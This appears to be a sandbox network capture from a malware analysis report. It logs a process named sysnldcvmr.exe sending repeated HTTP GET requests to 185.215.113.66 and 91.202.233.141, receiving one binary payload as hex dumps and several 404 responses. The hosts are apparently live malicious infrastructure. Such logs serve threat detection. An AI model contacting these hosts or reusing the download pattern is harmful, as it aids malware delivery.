                                                                                                                                                                                                                                                  Dec 5, 2024 17:33:08.017776012 CET1236INData Raw: 84 db 0e 73 27 8c 8e 32 19 7c 5f 7e 88 3f 77 9c 60 1b 86 3c 63 9f 5e d3 41 d2 d9 8a 4f 95 24 1c 1e f6 60 45 bf 19 d6 10 06 4b 4f 78 8f 76 05 5c 04 08 0b 84 be cf a5 90 5a 2f 4a 86 44 4c 3e 8e f6 2d dc 92 b9 a0 5e 28 d2 50 08 ce 41 d5 da a6 0e 57
                                                                                                                                                                                                                                                  Data Ascii: s'2|_~?w`<c^AO$`EKOxv\Z/JDL>-^(PAWS$0P"GgyUGdCj]}[`xT9/\^=}%1!lix7pwcdU"5glxDrcyzn#uZxT{4v
                                                                                                                                                                                                                                                  Dec 5, 2024 17:33:08.017855883 CET1236INData Raw: eb 8d 97 ab 4b 3a 53 7e da 7f 04 57 bf 19 a7 d6 f3 c3 06 10 b1 09 16 23 60 a7 ba 91 3f 02 de a7 97 e6 74 56 05 8f f9 4f 69 36 6f 76 dd a5 19 ef 75 eb ae 69 3c 09 59 9b 3f 79 da 82 48 6d 9c d2 ba 97 99 83 d8 37 62 31 82 6a 57 5c 5e 54 5f 48 89 00
                                                                                                                                                                                                                                                  Data Ascii: K:S~W#`?tVOi6ovui<Y?yHm7b1jW\^T_H#^fdD`[wj(MEmClltf99az(2>&n+owX0}n)y]EfiH7,>H79;~#4{`M1H<%>^At
                                                                                                                                                                                                                                                  Dec 5, 2024 17:33:08.017869949 CET1236INData Raw: 16 25 ae 88 64 71 0b 50 6d 5d 8c 63 a3 e9 91 25 1d aa 31 d9 aa 7a 7d 84 26 a2 95 76 45 23 54 e6 a5 ba c8 c4 c2 4f 36 d6 c9 45 2b a7 d0 b2 a6 b1 75 c4 a8 54 7d 9f da cf 6a dc 88 94 37 ff 38 1e b0 06 49 37 ed 2c 1a c5 bb 71 c3 2f 47 5a 84 9f a4 f8
                                                                                                                                                                                                                                                  Data Ascii: %dqPm]c%1z}&vE#TO6E+uT}j78I7,q/GZ`cr]c!E`qs7`.fg%yT_<Zi4V<NyDm}_Bh_3kSRUH|[E("[(uOtR<HcbJ&xF'KH
                                                                                                                                                                                                                                                  Dec 5, 2024 17:33:08.017882109 CET1236INData Raw: 20 a4 13 18 ef 97 b9 85 4c 87 0c 5e 0c 1a 67 ca 13 4f 06 00 22 3d e6 f5 8f b0 55 76 0f 6c 15 ae 5c 5c 57 5a 79 77 7d ed d9 96 48 e9 f1 39 38 66 67 ea f9 af 95 18 f7 5c 22 93 11 dc 4d 2d 2f 2c 66 ab 39 92 61 3d 01 75 ee 0b cb 04 d5 8c dd 42 4d 1a
                                                                                                                                                                                                                                                  Data Ascii: L^gO"=Uvl\\WZyw}H98fg\"M-/,f9a=uBMd"=M,Lo1{@QXR:d=GMw(ZD}E?5GN2KsZf#_qGm8Y61Hc!nb&HskiT1L2Y\Z?w(Vg6FA.;r
                                                                                                                                                                                                                                                  Dec 5, 2024 17:33:08.017894983 CET1236INData Raw: 82 ef 29 d7 83 57 67 67 d1 c1 72 17 81 4d c2 10 51 46 37 9f df 5d 5d c6 a6 e7 87 60 e1 21 98 20 70 0f 63 fc d6 a6 7f 00 d3 65 c6 9b f3 c6 71 fe 78 ec fb 00 0c 86 a7 25 8a 00 32 3a a6 1c 29 b2 89 d8 ac 37 4d 95 04 59 5c b1 46 e3 b1 2f aa d9 cc 11
                                                                                                                                                                                                                                                  Data Ascii: )WggrMQF7]]`! pceqx%2:)7MY\F/P!&mrDcbn0NWcD83Dkv\sLJ/ aU`|RyzDyc#_T(^V71YtMazp{P^:w(ofe
                                                                                                                                                                                                                                                  Dec 5, 2024 17:33:08.138207912 CET1236INData Raw: 7e 8d a9 13 7b ea ce ce 59 86 af da ff 6b ca 38 44 bc 32 9a 91 8c 1f 94 36 29 36 c7 1c d6 f8 74 96 7a 5a 96 7d 3b 68 4f 2c de 0e 1a c6 22 83 3c a8 7a 3e 73 40 5f 32 00 76 0a 3f 01 87 54 76 8c 6b 29 ff d0 63 38 3c 45 64 9f db 8f 2c 21 c7 a9 3d 40
                                                                                                                                                                                                                                                  Data Ascii: ~{Yk8D26)6tzZ};hO,"<z>s@_2v?Tvk)c8<Ed,!=@bV;?{!CxR\~DoP1*5"Na+=|]K%=s74O-ADfix)I(LH9[`>n>H*r5X`hD!Or5REpHt 9CQ')}A


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  17192.168.2.1149941185.215.113.66807744C:\Windows\sysnldcvmr.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  Dec 5, 2024 17:33:10.207612991 CET166OUTGET /5 HTTP/1.1
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Host: 185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:33:11.535954952 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                  Date: Thu, 05 Dec 2024 16:33:11 GMT
                                                                                                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                                                                                                  Content-Length: 66816
                                                                                                                                                                                                                                                  Last-Modified: Thu, 05 Dec 2024 16:18:27 GMT
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  ETag: "6751d253-10500"
                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                  Data Raw: 59 c8 13 50 1d f8 00 28 d4 3c 88 34 df 2b 4d 68 41 bc 72 70 ee 95 59 33 21 ac df a3 da 03 6e e1 9c 2f 7d c1 43 68 fd e7 23 38 43 6a 3b b3 0a 09 d6 00 18 a1 97 80 41 bb ee 53 60 95 b4 4b 94 36 fb 6b 23 f1 38 23 5f 5e b1 cc 57 ab e1 40 5f 96 22 6c 28 95 9b eb bc 8a 30 0f 9c d5 a9 d6 78 ae c9 24 73 55 19 2c 3f 43 87 88 19 3a e6 96 f8 ab a9 bb 9f 2a d3 90 bc 5e 4f 8f e3 37 56 8f d7 1c b4 67 1a 15 23 da 86 cd 87 6d f1 6d d3 9a c3 52 f8 c9 86 11 28 75 8e b0 49 f1 80 55 f8 20 01 99 bd 5e 01 23 f9 03 ba b4 ce 7e 70 67 36 02 f3 67 dc 6f 71 bc 54 48 14 d2 cb ec fd ff c1 5b f9 db 3f 73 54 b2 37 94 20 dc d2 62 83 57 4f 56 4a f2 d4 16 82 ea 1c 43 45 76 8b 93 95 d7 74 d2 53 86 f4 07 57 28 0a 98 f0 2e 4d 2d 61 c0 ac c8 eb 46 79 7d 6b 1b d4 aa e3 66 f9 df 88 7f 3e 1b 68 de 2b dc 80 f6 8b 14 02 0c 52 d8 eb 05 75 99 8f cf d1 31 5d 72 f6 c3 04 0f 22 6e 0a 4c 9d 6a db 4c 65 8b b0 dd cb c0 12 9a 0a aa cb 8c d6 09 0f 2e 59 fd 21 3b 06 72 63 2f d9 19 c7 6b fa 10 7b b9 44 cb f6 f8 f5 23 52 e0 c8 1a 00 16 71 b3 ab 8c e2 0c [TRUNCATED]
                                                                                                                                                                                                                                                  Data Ascii: YP(<4+MhArpY3!n/}Ch#8Cj;AS`K6k#8#_^W@_"l(0x$sU,?C:*^O7Vg#mmR(uIU ^#~pg6goqTH[?sT7 bWOVJCEvtSW(.M-aFy}kf>h+Ru1]r"nLjLe.Y!;rc/k{D#RqG}57*= c#X7o/fU3RyFU<GTYRpL4d_a,r-E2//&-W&]+LK@6HlOcR$pZZQcp1;bIr^;~SJ,mWwijEX6o57_IcPmqf/F#u={7z/X59ThJ(pcMRjsrM4o^xSd\6i1>z*)mZCks-'kvV6?hQ^j-m+;<E)r034, =Rl@O#6P_asA|?g}o k?Z5nD8E%|QL>G \@ #3zaY[g0aGiG<E#oZR-j]O b|S,Z?9C&]:jE>90F]qj(>rXn{v^e
                                                                                                                                                                                                                                                  Dec 5, 2024 17:33:11.535975933 CET124INData Raw: c6 7d 84 30 24 76 89 f0 37 5b fe 25 aa 52 93 09 22 e8 f0 4c 0a d9 9f e6 45 fe cc ed b4 af 8e 4c e4 d6 b7 de ab a2 e5 09 3c 68 a2 d8 37 ae d1 0f 94 d8 79 62 f8 4b 8c 24 6c 8f 02 df 92 3e b4 00 98 f9 87 60 ed 95 84 3f 74 c3 b9 d3 0e 94 6c fb 0c 4c
                                                                                                                                                                                                                                                  Data Ascii: }0$v7[%R"LEL<h7ybK$l>`?tlL's%[WX,FTjHihQ<Rr
                                                                                                                                                                                                                                                  Dec 5, 2024 17:33:11.536894083 CET1236INData Raw: 10 0b bc 33 cf fe 47 98 e1 3c 64 34 4c 56 24 40 b9 4d 3c 17 10 a2 d8 0b 9f b2 d8 5f cc ab fa 64 aa 9c 54 88 a4 ff 1a 7c 2c 67 cf e3 e0 2b af cb 15 dc 9b a2 89 55 5b 16 ce 7a 68 a8 5e 16 50 d1 49 01 5f c7 13 c4 77 f4 51 99 76 d4 56 9d a9 73 ae 15
                                                                                                                                                                                                                                                  Data Ascii: 3G<d4LV$@M<_dT|,g+U[zh^PI_wQvVs|nXaGIr30pZYz]>g13TXX5\Zb@9Ptev@r'r=f:s,84n@E@ uHkL>Dt1
                                                                                                                                                                                                                                                  Dec 5, 2024 17:33:11.536978006 CET1236INData Raw: d6 d7 c1 91 d0 16 35 39 77 ae 82 49 77 07 87 b0 fe 68 36 42 71 be 4e 2c 6b c5 6b 32 17 90 0c 01 67 95 20 af 14 e6 c5 d8 bb 6c 36 91 6d d0 79 35 10 91 b1 d6 1e ab 2d 36 37 1e f4 c8 88 10 8d 5a 83 93 da c5 27 c1 fe 06 f1 07 bc 4f e2 b2 2b e7 d4 b4
                                                                                                                                                                                                                                                  Data Ascii: 59wIwh6BqN,kk2g l6my5-67Z'O+M<U\R,Yn/cXtwl'T-@+RY4jLn$"p$on=POF'H:8{r(vW8^z`'r4Mb&}lF~5/
                                                                                                                                                                                                                                                  Dec 5, 2024 17:33:11.536989927 CET248INData Raw: bc 0a 03 56 b1 f9 76 e2 09 c5 78 f1 7f 0e 64 6c 58 5c d9 40 f1 30 be 6c da d1 c9 aa 45 fb 15 99 c0 9e 82 9e e0 7f 0b cc 42 e3 17 04 35 60 46 9f 17 d4 a6 85 8b 4d 63 8c b5 2a 43 73 bd 4f 42 aa e1 eb a5 ff d0 05 d3 73 30 ce ed ed 1f 18 60 3a a2 98
                                                                                                                                                                                                                                                  Data Ascii: VvxdlX\@0lEB5`FMc*CsOBs0`:R<&^)}ucG9#s[1G3Ml"b5r.,I<JR?8OTv-G9.pThB@r.ptk0Kw8|D-rf9::oZAz
                                                                                                                                                                                                                                                  Dec 5, 2024 17:33:11.537250042 CET1236INData Raw: 12 69 74 98 04 43 a2 b8 7f d5 a3 8b b7 37 27 e1 52 0d d4 c4 1c 8d 11 2f 19 a5 98 99 7b e2 e2 f4 ef e1 bc c6 f7 e2 e4 08 bf e2 89 44 f6 5b fd 03 ba d0 20 10 4a ea ee af a6 8b 56 82 31 4b aa 24 0b be 0e 4b a4 bd 2e 4c 4c 4c ca a6 e3 32 97 39 a6 8b
                                                                                                                                                                                                                                                  Data Ascii: itC7'R/{D[ JV1K$K.LLL296`6.A:#(7c4,?;Q2K^{|;&e8X]|k8dE.cse]tawqh%`>;Kb0J)cA*eRJR<3L?%?UGD*Ay
                                                                                                                                                                                                                                                  Dec 5, 2024 17:33:11.537318945 CET1236INData Raw: d0 2c db 0d c1 73 d0 56 4c 5b 90 be b7 24 2e bd 04 c0 8f f2 8d d4 dc a2 9f d9 d2 b3 af d2 b5 e8 d0 73 4b 79 4f f0 2d 88 46 2c 5b a5 ea 98 d1 92 95 3e b6 7b 77 18 71 4b 59 33 20 47 bd e0 80 0b dc 3c db a7 6b 9c 6c a1 a8 f4 9e 6d 92 7f ba db 91 d9
                                                                                                                                                                                                                                                  Data Ascii: ,sVL[$.sKyO-F,[>{wqKY3 G<klmf>z]\5BH.x{o;*5ICB!lEknlR(KI'^7kq1`<vbt0TZ#Ra>5Yr~O}Bs
                                                                                                                                                                                                                                                  Dec 5, 2024 17:33:11.537388086 CET248INData Raw: 28 3a cc ac 2b 96 97 b1 08 94 9d c6 e2 3a 43 81 30 a7 23 6a 76 82 58 b6 32 96 0e 36 ae 2c e6 c9 cd ed 4e e6 b9 f6 22 74 d6 5e fe 27 da d9 f1 fc a4 9f de f1 cf 4b e1 a7 b5 fd 22 b3 80 fd 19 3a 67 5d 2f 3c 3c 52 ab a7 67 41 13 5e b2 95 e5 28 2d 73
                                                                                                                                                                                                                                                  Data Ascii: (:+:C0#jvX26,N"t^'K":g]/<<RgA^(-s%82("tO|uydR'9)t7ptzqI"N#I]zEw_`B04"eWm9VQJWQ84wZ* '(kSO?KJ8J][J-
                                                                                                                                                                                                                                                  Dec 5, 2024 17:33:11.537858963 CET1236INData Raw: 7d 28 67 b2 35 31 cd e8 49 09 2a a8 7f 40 bb 75 b4 6e ad fe 3c 0a 84 26 89 76 15 12 72 b4 04 2c 66 31 e4 74 8f 5e d0 a5 c4 84 7d 8f 94 bb 11 ec 05 d7 49 cc bd f9 39 67 d2 4a 86 5d 7a 9c ae 55 3b 2f 15 68 53 e2 2b 20 9c 5c b8 f2 9c f5 d8 bf 81 46
                                                                                                                                                                                                                                                  Data Ascii: }(g51I*@un<&vr,f1t^}I9gJ]zU;/hS+ \FQ'vo-,1T]'Y5*\#;;dZpYQM7#s<Y_-2f?.iAgW%RmmjCGrs?BF4X^
                                                                                                                                                                                                                                                  Dec 5, 2024 17:33:11.537955046 CET1236INData Raw: 80 29 c3 1b 91 2c 56 75 94 50 da 12 a2 5c 9e 90 1d 9a 9f fe 26 ea a8 1f d1 b3 57 33 8f 35 74 48 82 da 6b 2d ea 8c c4 0a 58 7b 3b f9 a5 b2 68 c8 43 18 f6 b4 6e 69 26 15 28 df fc d4 4f 36 c5 93 ca 6f 8d 58 34 0c f5 53 01 78 2d 10 c6 2d 7c ca 9e 6b
                                                                                                                                                                                                                                                  Data Ascii: ),VuP\&W35tHk-X{;hCni&(O6oX4Sx--|kiW'TF;%.ExZ}_`S0q!0Nc9^EySD6`L0Gk{42BCWv6amV_?}"o_w#~_Pf.ym<-#jD*
                                                                                                                                                                                                                                                  Dec 5, 2024 17:33:11.658019066 CET1236INData Raw: 6d 99 87 9a de 95 6e d2 d5 cc 32 ae ca d7 b3 f6 eb 75 01 11 13 c8 5b 53 fc b7 b1 5f c9 89 fb b6 17 06 f9 3b 07 5a b3 b7 5c 73 8b f3 52 47 83 96 d9 bc 0a b3 37 35 89 38 17 df b7 91 93 b3 36 2d 6a 3d db 8b 22 cc 2d f2 ae 67 c2 2a c9 4a bc f1 70 3c
                                                                                                                                                                                                                                                  Data Ascii: mn2u[S_;Z\sRG7586-j="-g*Jp<&]2=.yp0SbdcHqH]T|1pX3t/I+.?h!7v?NJAE=oaT:O(sR*Au P+H~p2.X$I2


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  18192.168.2.114995391.202.233.141807744C:\Windows\sysnldcvmr.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  Dec 5, 2024 17:33:14.845904112 CET166OUTGET /1 HTTP/1.1
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Host: 91.202.233.141
                                                                                                                                                                                                                                                  Dec 5, 2024 17:33:16.187849998 CET728INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                  Date: Thu, 05 Dec 2024 16:33:15 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                  Content-Length: 564
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                                                                                                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  19192.168.2.114996391.202.233.141807744C:\Windows\sysnldcvmr.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  Dec 5, 2024 17:33:18.346934080 CET166OUTGET /2 HTTP/1.1
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Host: 91.202.233.141
                                                                                                                                                                                                                                                  Dec 5, 2024 17:33:19.696592093 CET728INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                  Date: Thu, 05 Dec 2024 16:33:19 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                  Content-Length: 564
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                                                                                                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  20192.168.2.114997191.202.233.141807744C:\Windows\sysnldcvmr.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  Dec 5, 2024 17:33:21.942837954 CET166OUTGET /3 HTTP/1.1
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Host: 91.202.233.141
                                                                                                                                                                                                                                                  Dec 5, 2024 17:33:23.261398077 CET728INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                  Date: Thu, 05 Dec 2024 16:33:23 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                  Content-Length: 564
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                                                                                                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  21192.168.2.114998191.202.233.141807744C:\Windows\sysnldcvmr.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  Dec 5, 2024 17:33:25.519133091 CET166OUTGET /4 HTTP/1.1
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Host: 91.202.233.141
                                                                                                                                                                                                                                                  Dec 5, 2024 17:33:26.948590994 CET728INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                  Date: Thu, 05 Dec 2024 16:33:26 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                  Content-Length: 564
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                                                                                                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  22192.168.2.114999191.202.233.141807744C:\Windows\sysnldcvmr.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  Dec 5, 2024 17:33:29.168576002 CET166OUTGET /5 HTTP/1.1
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Host: 91.202.233.141
                                                                                                                                                                                                                                                  Dec 5, 2024 17:33:30.498797894 CET728INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                  Date: Thu, 05 Dec 2024 16:33:30 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                  Content-Length: 564
                                                                                                                                                                                                                                                  Connection: keep-alive
